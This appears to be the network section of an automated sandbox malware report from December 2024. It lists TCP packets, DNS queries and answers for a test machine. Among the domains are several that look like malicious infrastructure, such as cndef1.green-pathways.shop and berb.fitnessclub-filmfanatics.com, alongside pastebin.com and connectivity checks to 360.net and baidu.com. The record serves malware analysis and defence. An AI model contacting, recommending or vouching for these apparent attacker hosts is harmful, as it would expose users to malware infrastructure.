                                                                                                  Dec 17, 2024 08:48:06.442780972 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.443186045 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.443206072 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.443273067 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.476774931 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.476849079 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.519169092 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.519306898 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.519398928 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.519530058 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.522161007 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.524436951 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.531122923 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.531228065 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.544240952 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.544337034 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.557039976 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.557122946 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.557161093 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.557239056 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.570159912 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.570236921 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.576411009 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.576483011 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.585870981 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.585942030 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.594497919 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.594623089 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.599055052 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.599143028 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.607973099 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.608047009 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.612098932 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.612178087 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.622313023 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.622383118 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.629149914 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.629255056 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.629739046 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.629806042 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.639683962 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.639756918 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.645466089 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.645535946 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.711029053 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.711150885 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.712752104 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.712821960 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.719757080 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.719835997 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.723525047 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.723619938 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.726773024 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.726870060 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.734272957 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.734364033 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.736864090 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.736928940 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.742770910 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.742861032 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.746810913 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.746880054 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.749666929 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.749732971 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.755275965 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.755347013 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.759027004 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.759102106 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.761522055 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.761579990 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.769074917 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.769138098 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.769160032 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.769211054 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.770088911 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.770137072 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.773452997 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.773540020 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.777101040 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.777159929 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.778608084 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.778659105 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.782913923 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.782978058 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.785326004 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.785410881 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.785428047 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.788490057 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.788583994 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.791922092 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.791991949 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.794094086 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.794173002 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.797230005 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.797306061 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.830128908 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.830200911 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.830275059 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.830362082 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.830418110 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.830418110 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.909670115 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.909701109 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.909778118 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.909868956 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.909915924 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.909915924 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.919414997 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.919450045 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.920454025 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.920454025 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.920474052 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.920543909 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.930350065 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.930407047 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.930445910 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.930464029 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.930535078 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.930535078 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.941324949 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.941371918 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.941410065 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.941426039 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.941457987 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.941477060 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.951677084 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.951744080 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.951778889 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.951798916 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.951858044 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.960588932 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.960656881 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.960695982 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.960716009 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.960782051 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.960782051 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.966794014 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.966855049 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.966890097 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.966898918 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:06.966942072 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:06.966953993 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.020750046 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.020778894 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.020832062 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.020859003 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.020895958 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.020917892 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.100085974 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.100119114 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.100181103 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.100214958 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.100234032 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.100265980 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.106139898 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.106163979 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.106215954 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.106230021 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.106264114 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.106291056 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.112922907 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.112937927 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.112986088 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.112997055 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.113008022 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.113038063 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.113054037 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:07.113065004 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.113104105 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.113213062 CET49704443192.168.2.5104.21.83.229
                                                                                                  Dec 17, 2024 08:48:07.113231897 CET44349704104.21.83.229192.168.2.5
                                                                                                  Dec 17, 2024 08:48:10.497189999 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:10.497246981 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:10.497318029 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:10.506464958 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:10.506480932 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:11.725001097 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:11.725075006 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:11.752425909 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:11.752499104 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:11.753412008 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:11.767348051 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:11.811336040 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.534213066 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.534311056 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.534373999 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.534424067 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:12.534429073 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.534457922 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.534486055 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:12.542442083 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.542494059 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.542519093 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:12.542532921 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.542567015 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:12.550601006 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.550708055 CET44349708172.67.19.24192.168.2.5
                                                                                                  Dec 17, 2024 08:48:12.550879002 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:12.702212095 CET49708443192.168.2.5172.67.19.24
                                                                                                  Dec 17, 2024 08:48:19.571477890 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:19.571572065 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:19.571655989 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:19.572113037 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:19.572146893 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:21.394326925 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:21.394613028 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:21.398425102 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:21.398447990 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:21.398730040 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:21.405850887 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:21.447329044 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:22.107053041 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:22.107239962 CET44349715180.163.242.102192.168.2.5
                                                                                                  Dec 17, 2024 08:48:22.107347012 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:22.107861042 CET49715443192.168.2.5180.163.242.102
                                                                                                  Dec 17, 2024 08:48:25.400151968 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:25.400252104 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:25.400367975 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:25.400948048 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:25.400975943 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:27.593707085 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:27.593802929 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:27.593841076 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:27.593904972 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:27.599015951 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:27.599031925 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:27.599524021 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:27.609570980 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:27.655380011 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.154800892 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.162935019 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.163019896 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:28.163053989 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.163106918 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:28.179893970 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.179986000 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:28.196558952 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.196636915 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:28.351270914 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.351551056 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:28.351905107 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:28.351963997 CET44349728103.235.47.188192.168.2.5
                                                                                                  Dec 17, 2024 08:48:28.352022886 CET49728443192.168.2.5103.235.47.188
                                                                                                  Dec 17, 2024 08:48:29.662024975 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:29.662077904 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:29.662183046 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:29.662569046 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:29.662585020 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:30.885070086 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:30.885248899 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:30.887063980 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:30.887094021 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:30.887485981 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:30.888551950 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:30.931355953 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.316813946 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.316875935 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.316915035 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.316951036 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.316993952 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:31.317043066 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.317064047 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:31.317064047 CET44349739104.21.66.20192.168.2.5
                                                                                                  Dec 17, 2024 08:48:31.317112923 CET49739443192.168.2.5104.21.66.20
                                                                                                  Dec 17, 2024 08:48:31.319150925 CET49739443192.168.2.5104.21.66.20

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Dec 17, 2024 08:48:04.074757099 CET5998053192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:04.220475912 CET53599801.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:10.328735113 CET5696053192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:10.466924906 CET53569601.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:18.014192104 CET5082453192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:19.025834084 CET5082453192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:19.570688009 CET53508241.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:19.570732117 CET53508241.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:22.111862898 CET6237453192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:23.119909048 CET6237453192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:23.845731020 CET53623741.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:23.845766068 CET53623741.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:25.167845011 CET6125153192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:25.398355961 CET53612511.1.1.1192.168.2.5
                                                                                                  Dec 17, 2024 08:48:29.365550995 CET6529853192.168.2.51.1.1.1
                                                                                                  Dec 17, 2024 08:48:29.660840988 CET53652981.1.1.1192.168.2.5

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Dec 17, 2024 08:48:04.074757099 CET192.168.2.51.1.1.10x477fStandard query (0)cndef1.green-pathways.shopA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:10.328735113 CET192.168.2.51.1.1.10x6551Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:18.014192104 CET192.168.2.51.1.1.10xaf21Standard query (0)www.360.netA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:19.025834084 CET192.168.2.51.1.1.10xaf21Standard query (0)www.360.netA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:22.111862898 CET192.168.2.51.1.1.10x5e87Standard query (0)360.netA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:23.119909048 CET192.168.2.51.1.1.10x5e87Standard query (0)360.netA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:25.167845011 CET192.168.2.51.1.1.10x72a1Standard query (0)www.baidu.comA (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:29.365550995 CET192.168.2.51.1.1.10xe1d9Standard query (0)berb.fitnessclub-filmfanatics.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Dec 17, 2024 08:48:04.220475912 CET1.1.1.1192.168.2.50x477fNo error (0)cndef1.green-pathways.shop104.21.83.229A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:04.220475912 CET1.1.1.1192.168.2.50x477fNo error (0)cndef1.green-pathways.shop172.67.182.220A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:10.466924906 CET1.1.1.1192.168.2.50x6551No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:10.466924906 CET1.1.1.1192.168.2.50x6551No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:10.466924906 CET1.1.1.1192.168.2.50x6551No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:19.570688009 CET1.1.1.1192.168.2.50xaf21No error (0)www.360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:19.570732117 CET1.1.1.1192.168.2.50xaf21No error (0)www.360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:23.845731020 CET1.1.1.1192.168.2.50x5e87No error (0)360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:23.845766068 CET1.1.1.1192.168.2.50x5e87No error (0)360.net180.163.242.102A (IP address)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:25.398355961 CET1.1.1.1192.168.2.50x72a1No error (0)www.baidu.comwww.a.shifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:25.398355961 CET1.1.1.1192.168.2.50x72a1No error (0)www.a.shifen.comwww.wshifen.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Dec 17, 2024 08:48:25.398355961 CET1.1.1.1192.168.2.50x72a1No error (0)www.wshifen.com103.235.47.188A (IP address)IN (0x0001)false
